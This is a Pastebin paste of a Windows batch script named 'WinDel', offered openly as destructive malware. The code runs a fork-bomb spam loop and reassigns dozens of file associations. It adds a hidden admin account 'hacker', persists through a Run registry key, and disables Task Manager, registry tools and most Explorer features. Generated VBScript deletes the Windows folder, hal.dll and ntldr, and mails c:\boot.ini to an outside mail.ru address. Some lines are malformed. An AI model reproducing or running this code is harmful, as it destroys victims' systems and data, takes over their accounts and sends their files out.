Advertisement
MineHack7488

WinDel

Oct 4th, 2021 (edited)
237
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.25 KB | None | 0 0
  1. start %cd%\matrix.bat
  2. :virus
  3. @echo off
  4. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
  5. del "%SystemRoot%Cursors*.*" >nul
  6. chcp 1251
  7. title WinDel working...
  8. color a
  9. rundll32 user,SwapMouseButton
  10. rundll32 keyboard,disable
  11. rundll32 mouse,disable
  12.  
  13. assoc .exe=.mp3 >nul
  14. assoc .mp3=.bmp >nul
  15. assoc .bmp=.mp3 >nul
  16. assoc .jpg=.mp3 >nul
  17. assoc .avi=.jpg >nul
  18. assoc .txt=.mp3 >nul
  19. assoc .sys=.mp3 >nul
  20. assoc .dll=.mp3 >nul
  21. assoc .tmp=.mp3 >nul
  22. assoc .ini=.mp3 >nul
  23. assoc .flv=.txt >nul
  24. assoc .doc=.mp3 >nul
  25. assoc .rar=.mp3 >nul
  26. assoc .xls=.mp3 >nul
  27. assoc .xlsx=.mp3 >nul
  28. assoc .log=.mp3 >nul
  29. assoc .rtf=.mp3 >nul
  30. assoc .rif=.mp3>nul
  31. assoc .docm=.mp3 >nul
  32. assoc .scr=.mp3 >nul
  33. assoc .cif=.mp3 >nul
  34. assoc .zip=.mp3 >nul
  35. assoc .dat=.mp3 >nul
  36. assoc .inf=.mp3 >nul
  37. assoc .gif=.rar >nul
  38. assoc .wav=.zip >nul
  39. assoc .mp4=.txt >nul
  40. assoc .jpeg=.mp4 >nul
  41.  
  42. :spam
  43. start %0
  44. taskkill /f /im explorer.exe >nul
  45. start chrome
  46. start mspaint
  47. start notepad
  48. start calc
  49. msg * Deleting windows...
  50. goto spam
  51.  
  52. net user SUPPORT_388945a0 /delete
  53. net user hacker hack /add
  54. net localgroup Администраторы hacker /add
  55. net localgroup Пользователи SUPPORT_388945a0 /del
  56. reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
  57.  
  58. del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
  59. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
  60. echo Chr(39)>%temp%\temp1.vbs
  61. echo Chr(39)>%temp%\temp2.vbs
  62. echo on error resume next > %temp%\temp.vbs
  63. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
  64. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
  65. reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
  66. copy %¶§% %SystemRoot%\user32dll.bat
  67. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
  68. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  69. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
  70. echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
  71. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
  72. reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
  73. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
  74. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
  75. echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
  76. echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
  77. echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
  78. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  79. echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
  80. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  81. echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
  82. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  83. echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
  84. echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs
  85. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbs
  86. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbs
  87. echo on error resume next > %temp%\temp1.vbs
  88. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
  89. echo do>>%temp%\temp1.vbs
  90. echo fso.getfile ("A:\")>>%temp%\temp1.vbs
  91. echo loop>>%temp%\temp1.vbs
  92. echo on error resume next > %temp%\temp2.vbs
  93. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
  94. echo do>>%temp%\temp2.vbs
  95. echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
  96. echo loop>>%temp%\temp2.vbs
  97. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
  98. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
  99. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  100. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
  101. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  102. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
  103. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
  104. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
  105. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
  106. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
  107. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
  108. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
  109. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
  110. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
  111. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
  112. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
  113. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
  114. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  115. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  116. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  117. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
  118. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
  119. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
  120. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
  121. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  122. echo set application=createobject("shell.application")>>%temp%\temp.vbs
  123. echo application.minimizeall>>%temp%\temp.vbs
  124. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
  125. start rundll32 user32, SwapMouseButton
  126. reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
  127. echo i=50 >> %temp%\temp.vbs
  128. echo while i^>0 or i^<0 >> %temp%\temp.vbs
  129. echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp%\temp.vbs
  130. echo i=i-1 >> %temp%\temp.vbs
  131. echo wend >> %temp%\temp.vbs
  132. echo do >> %temp%\temp.vbs
  133. echo wscript.sleep 200 >> %temp%\temp.vbs
  134. echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
  135. echo wscript.sleep 200 >> %temp%\temp.vbs
  136. echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
  137. echo wscript.sleep 200 >> %temp%\temp.vbs
  138. echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
  139. echo loop>> %temp%\temp.vbs
  140. echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
  141. echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
  142. echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
  143. echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
  144. echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
  145. echo next >> %temp%\temp.vbs
  146. echo End If >> %temp%\temp.vbs
  147. echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
  148. echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
  149. echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
  150. echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
  151. echo Set Flds = iConf.Fields >> %temp%\temp.vbs
  152. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
  153. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
  154. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
  155. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
  156. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
  157. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
  158. echo Flds.Update >> %temp%\temp.vbs
  159. echo iMsg.Configuration = iConf >> %temp%\temp.vbs
  160. echo iMsg.To = strTo >> %temp%\temp.vbs
  161. echo iMsg.From = strFrom >> %temp%\temp.vbs
  162. echo iMsg.Subject = strSubject >> %temp%\temp.vbs
  163. echo iMsg.TextBody = strBody >> %temp%\temp.vbs
  164. echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
  165. echo iMsg.Send >> %temp%\temp.vbs
  166. echo End Function >> %temp%\temp.vbs
  167. echo Set iMsg = Nothing >> %temp%\temp.vbs
  168. echo Set iConf = Nothing >> %temp%\temp.vbs
  169. echo Set Flds = Nothing >> %temp%\temp.vbs
  170.  
  171. start %temp%\temp.vbs
  172. start %temp%\temp1.vbs
  173. start %temp%\temp2.vbs
  174.  
  175. rundll32 user,disableoemlayer
  176. del %systemroot%\system32\HAL.dll
  177. goto virus
  178.  
  179. shutdown /r /t 5 /c "Не плач!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement